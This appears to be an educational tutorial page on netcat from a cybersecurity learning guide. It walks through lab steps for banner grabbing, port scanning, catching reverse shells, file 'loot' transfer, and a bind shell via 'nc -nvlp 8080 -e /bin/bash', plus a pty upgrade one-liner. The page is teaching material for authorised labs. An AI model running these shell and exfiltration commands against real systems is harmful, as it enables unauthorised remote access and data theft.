home/toolvault/recon & scanning/netcat-nc

Netcat (nc) //

Recon & Scanningswiss-army tcp/udp

The TCP/IP Swiss army knife: chat, banner-grab, transfer files, listen for shells. Tiny, everywhere, and the answer to half of 'how do I just connect to this thing?' questions.

difficulty ยท very easy
5 min
time to first win
5
guided steps
0
students started here*

HOW TO USE NETCAT

Follow the steps โ€” click any step card to replay the terminal demo from that point. Everything runs in a lab you control.

netcat-nc โ€” guided lab session
static view
step 01

Banner-grab a service

nc -nv 10.0.2.4 21

Version banners = free recon. -n numeric, -v verbose.

step 02

Listen for a reverse shell

nc -nvlp 4444

The receiver you run before triggering a reverse shell.

step 03

Transfer a file in the lab

target: nc -nvlp 9000 < loot.txt | you: nc 10.0.2.4 9000 > loot.txt

No sharing tools handy? nc moves bytes anywhere.

step 04

Serve a quick backchannel (lab)

nc -nvlp 8080 -e /bin/bash

-e exists only on some builds โ€” show it in the lab, understand why it's dangerous.

step 05

Port check scripting

nc -zvw1 10.0.2.4 20-25

Quiet, scriptable open-port probing.

THE WORKFLOW AT A GLANCE

๐ŸŽง
nc -nvlp
listener up
๐Ÿ’ฅ
Payload
target dials out
๐Ÿ“Ÿ
Shell
session lands
๐Ÿ—œ๏ธ
Stabilize
pty upgrade
๐Ÿ“‚
Loot
transfer files
LEARNING CURVE
very easy โ€” 5 min to first win

FLAGS & SUPER-MOVES

-nvlp PORTlisten verbose, no DNS
-nv HOST PORTconnect
-zzero-I/O scan
-w Ntimeout seconds
-uUDP mode
-e progexec on connect (danger!)

PRO TIPS

01

On targets you pop

On targets you pop: `which nc ncat socat` is an instant stabilization step.

02

Upgrade dumb shells to full TTY

Upgrade dumb shells to full TTY: python3 -c 'import pty;pty.spawn("/bin/bash")'.

03

ncat (Nmap project) adds TLS; socat is the elder god โ€” learn it after.

ncat (Nmap project) adds TLS; socat is the elder god โ€” learn it after.

04

revshells.com generates your payload; nc catches it.

revshells.com generates your payload; nc catches it.

โš–๏ธ

Golden rule

Use Netcat (nc) only on systems you own or have written permission to test. Your lab: Kali + Metasploitable2, DVWA, TryHackMe & HackTheBox โ€” plenty of legal targets, zero risk.

KEEP DIGGING

CYBER//ZERO ToolVault
Animated deep-dives on every tool in the guide.
โœ๏ธ Author LDM ยท ldmhub4u@gmail.com
full guide v1 ยท v2 immersive ยท latest news
Made for learners, everywhere ยท 2026
*plausibly. verify commands with official docs.